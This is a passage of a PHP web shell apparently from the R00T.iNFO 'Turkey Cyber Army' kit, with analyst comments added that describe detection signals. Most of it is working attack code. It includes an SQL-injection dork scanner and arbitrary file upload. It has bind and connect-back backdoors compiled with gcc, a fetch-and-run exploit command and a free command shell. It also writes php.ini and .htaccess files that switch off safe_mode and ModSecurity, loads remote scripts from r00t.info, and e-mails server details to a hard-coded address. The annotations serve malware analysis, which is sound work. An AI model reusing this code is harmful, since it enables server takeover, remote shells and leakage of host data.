7641<div class="fb-like-box" data-href="hxxp://www.facebook.com/pages/JKT48-Fans-Indonesia/350715818365286" data-width="400" data-height="350" data-colorscheme="light" data-show-faces="true" data-header="true" data-stream="false" data-show-border="true"></div>
7642//-->
7643</script>
7644
7645<br />
7646<div style="font-family: verdana;">
7647<center>
7648<b>Facebook ID Finder</b><br />
7649<br />
7650<small>
7651<div style="text-align: center;">
7652Tool ini berguna bagi anda yang ingin mengetahui ID Profile Facebook.<br />
7653Bukan hanya Profil, tapi anda juga bisa mencari ID aplikasi halaman, dll.<br />
7654Tulis username anda (www.facebook.com/INI USERNAME) , halaman, atau aplikasi,<br />
7655kemudian klik <b>Get Facebook ID.</b></div>
7656</small>
7657<br />
7658<center>
7659<form action="hxxps://graph.facebook.com/?id=" method="get">
7660<input class="textinput" name="id" size="35" type="text" /> <input class="buttonsubmit" name="submit" type="submit" value="Get Facebook ID" /></form>
7661</center>
7662<div style="text-align: center;">
7663<small>Tool ini dibuat oleh : <b><a href="hxxp://r00t.info" target="_blank">DFC48</a></b></small></div>
7664 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'comuser')) { ?>
7665 <form action="?y=<?php echo $pwd; ?>&x=comuser" method="post">
7666 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://www.gim3-skierniewice.pl/administrator/newfile.php" width="100%"></iframe>
7667 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner')) { ?>
7668<form action="?y=<?php echo $pwd; ?>&x=sqli-scanner" method="post">
7669
7670<?php
// Analyst note: "sqli-scanner" branch - turns the compromised host into an
// outbound scanner. The POST field `dork` is sent as a search query to the
// hard-coded front-end in $first, and result links are pulled out with $reg.
echo '<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> <input class="inputz" type="text" value="" name="dork" style="color:#FF0000;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan"></form></center>'; ob_start(); set_time_limit(0); if (isset($_POST['scan'])) { $browser = $_SERVER['hxxp_USER_AGENT']; $first = "startgoogle.startpagina.nl/index.php?q="; $sec = "&start="; $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/'; for($id=0 ; $id<=30; $id++){ $page=$id*10; $dork=urlencode($_POST['dork']); $url = $first.$dork.$sec.$page; $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl,CURLOPT_USERAGENT,'$browser)'); $result = curl_exec($curl); curl_close($curl); preg_match_all($reg,$result,$matches); }
// Each collected URL has every "=" rewritten to "='" and is fetched with a
// 5-second timeout; the body is then matched against MySQL/PHP error text.
// Network signature on the receiving side: because the User-Agent option is a
// single-quoted PHP string, the header sent is the literal text `$browser)`,
// and every query parameter value starts with a single quote. Sites that do
// not return database error text to clients give this check nothing to match.
// On the compromised host: sustained outbound HTTP from the web-server account.
foreach($matches[1] as $site){ $url = preg_replace("/=/", "='", $site); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl,CURLOPT_USERAGENT,'$browser)'); curl_setopt($curl,CURLOPT_TIMEOUT,'5'); $GET=curl_exec($curl); if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT *
7671
7672FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) { echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font color=#FF0000> <-- SQLI Vuln
7673
7674Found..</font></b></center>'; ob_flush();flush(); }else{ echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16"> <-- Not Vuln</font></center>'; ob_flush();flush(); } ob_flush();flush(); } ob_flush();flush(); } ob_flush();flush(); }
// Analyst note: "upload" branch - arbitrary file write. Either an uploaded
// file is moved to <path><client-supplied name>, or a remote URL is fetched by
// download() with the method chosen in `pilihan`. magicboom() and download()
// are defined outside this excerpt. Neither path nor file name is restricted
// here, so review recently created files anywhere the web-server account can
// write, not only under the document root.
elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
7675<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
7676<table class="tabnet" style="width:320px;padding:0 1px;">
7677<tr><th colspan="2">Upload from computer</th></tr>
7678<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
7679<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
7680</tr>
7681</table></form>
7682<table class="tabnet" style="width:320px;padding:0 1px;">
7683<tr><th colspan="2">Upload from url</th></tr>
7684<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
7685<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="hxxp://www.some-code/exploits.c"></td></tr>
7686<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
7687<tr><td><select size="1" class="inputz" name="pilihan">
7688<option value="wwget">wget</option>
7689<option value="wlynx">lynx</option>
7690<option value="wfread">fread</option>
7691<option value="wfetch">fetch</option>
7692<option value="wlinks">links</option>
7693<option value="wget">GET</option>
7694<option value="wcurl">curl</option>
7695</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
7696</tr>
7697</table>
7698<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
7699<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
// Analyst note: "netsploit" branch - three remote-access actions selected by
// which submit button was posted. tulis(), exe(), which() and download() and
// the payload variables ($port_bind_bd_c, $port_bind_bd_pl, $back_connect_c,
// $back_connect) are defined outside this excerpt. Request values are trimmed
// and then concatenated into command lines.
// `bind`: write and start a listener (artifacts bdc.c, bdc, bdp).
if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
// `backconn`: write and start a program that connects out to the posted
// ip/backport (artifacts bcc.c, bcc, bcp). Egress filtering for the web-server
// account and alerting on outbound connections from child processes of the
// web server cover this path.
elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." 
..."; }
// `expcompile`: fetch a remote file with download() and then run a command
// through exe(). $wcmd is not assigned in this excerpt. Host-side signals for
// the whole branch: the web-server account invoking gcc, perl, chmod, or a
// download client, and short-lived source files in web directories.
elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>
7700<table class="tabnet">
7701<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
7702<tr>
7703<td>
7704<table>
7705<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
7706<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
7707<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
7708<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
7709<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
7710</table>
7711</td>
7712<td>
7713<table>
7714<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
7715<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
7716<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
7717<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
7718<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
7719</table>
7720</td>
7721<td>
7722<table>
7723<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
7724<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
7725<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
7726</tr>
7727<tr><td><select size="1" class="inputz" name="pilihan">
7728<option value="wwget">wget</option>
7729<option value="wlynx">lynx</option>
7730<option value="wfread">fread</option>
7731<option value="wfetch">fetch</option>
7732<option value="wlinks">links</option>
7733<option value="wget">GET</option>
7734<option value="wcurl">curl</option>
7735</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
7736</table>
7737</td>
7738</tr>
7739</table>
7740<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
7741<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
7742<form action="?y=<?php echo $pwd; ?>&x=shell" method="post">
7743<table class="cmdbox">
7744<tr><td colspan="2">
7745<textarea class="output" readonly>
7746<?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?>
7747</textarea>
7748<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
7749</table>
7750</form>
7751<?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
7752<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />
7753<?php /*
 * Analyst note: handler for the "Bypass Disable Functions and Safemode" button
 * rendered just above this block. When the POST field `ini` is present it
 * writes two files through relative paths (so they land in the script's
 * current working directory), prints a JavaScript alert and stops with die().
 *
 * $byphp is a php.ini body whose settings aim to switch off safe_mode,
 * disable_functions and open_basedir and to turn allow_url_fopen on.
 *
 * Both file_put_contents() calls are made without flags, so an existing
 * php.ini or .htaccess of the same name is overwritten, not appended to.
 *
 * The digits that open the continuation lines inside the two string literals
 * (7754 ... 7762) look like line-number residue from the paste rendering and
 * not part of the original payload -- confirm against a recovered sample.
 *
 * Triage: an unexpected php.ini or .htaccess carrying these directives inside
 * a web-served directory is a strong compromise indicator; compare it with the
 * deployed baseline and restore the original. Whether either file has any
 * effect depends on server configuration that is not visible here
 * (per-directory ini handling, override permissions, ModSecurity version).
 */
if(isset($_POST['ini'])) { $byphp = "safe_mode = Off
7754disable_functions = None
7755safe_mode_gid = OFF
7756open_basedir = OFF
7757allow_url_fopen = On";
/*
 * $byht is an .htaccess body: four SecFilter* directives set to Off inside an
 * IfModule test for mod_security.c. These are ModSecurity 1.x directive names.
 * NOTE(review): presumably skipped on ModSecurity 2.x and later, where the
 * module file name differs -- verify on the affected host.
 */
$byht = "<IfModule mod_security.c>
7758SecFilterEngine Off
7759SecFilterScanPOST Off
7760SecFilterCheckURLEncoding Off
7761SecFilterCheckUnicodeEncoding Off
7762</IfModule>";
/* Drop both files next to the script, confirm to the operator, then end the request. */
file_put_contents("php.ini",$byphp); file_put_contents(".htaccess",$byht); echo "<script>alert('Disable Functions and Safemode Created'); hideAll();</script>"; die(); } ?></div></div>
7763<div class="footer">laked by <a href='hxxps://www.facebook.com/r00t.info/' target='_blank'>R00T.iNFO</a> - Turkey Cyber Army team</div>
7764<script src=hxxp://r00t.info/ccb.js></script>
7765</body>
7766</html>
7767<script type="text/javascript">
/*
 * Analyst note: writes a script element that pulls log.js from the same
 * remote host the page's plain script tags (ccb.js) point at. The string has
 * no percent-escapes, so unescape() changes nothing here. What log.js does is
 * not visible on this page; the practical consequence is that any browser
 * rendering this shell -- the operator's or an analyst's -- fetches and runs
 * third-party JavaScript. Review the file as text or in an isolated browser
 * profile, and treat the host name as a proxy/DNS log indicator. The URL is
 * defanged (hxxp) as pasted.
 */
7768document.write(unescape('<script src=hxxp://r00t.info/lcrlamersavar/log.js></script>'));
7769</script>
7770<script src=hxxp://r00t.info/ccb.js></script>
7771
7772<?php /*
 * Analyst note: notification beacon. This block is not wrapped in any
 * condition of its own, so wherever execution reaches the end of the file it
 * e-mails details of the hosting server to a hard-coded address. In effect
 * the kit reports each installation to whoever controls that mailbox, which
 * need not be the person who uploaded it.
 *
 * Detection: look in MTA logs for mail submitted by the web server account
 * with this recipient or subject, and search web roots for the literal
 * strings below. The "hxxp" inside the URL prefix and inside the
 * $_SERVER key looks like defanging applied when the sample was pasted
 * (NOTE(review): the original presumably read HTTP_HOST -- confirm against a
 * recovered file).
 */
// Recipient ("kime" is Turkish for "to whom").
$kime = "byhero44@gmail.com";
// Subject ("baslik"); "Server Avcisi" translates roughly to "Server Hunter".
$baslik = "r00t.info Server Avcisi V1.0";
// Body line 1 -- "Dosya Yolu" (file path): the document root.
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
// Body line 2: the configured server admin contact.
$EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
// Body line 3 -- "Server isletim sistemi" (server operating system): the server software banner.
$EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
// Body line 4: URL of this script, built from SERVER_NAME and PHP_SELF.
$EL_MuHaMMeD.= "Shell Link : hxxp://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
// Body line 5 -- "Avlanan Site" (hunted site): the requested host name.
$EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['hxxp_HOST'] . "\r\n";
// Send through the server's own mail() transport; the return value is ignored.
mail($kime, $baslik, $EL_MuHaMMeD); ?>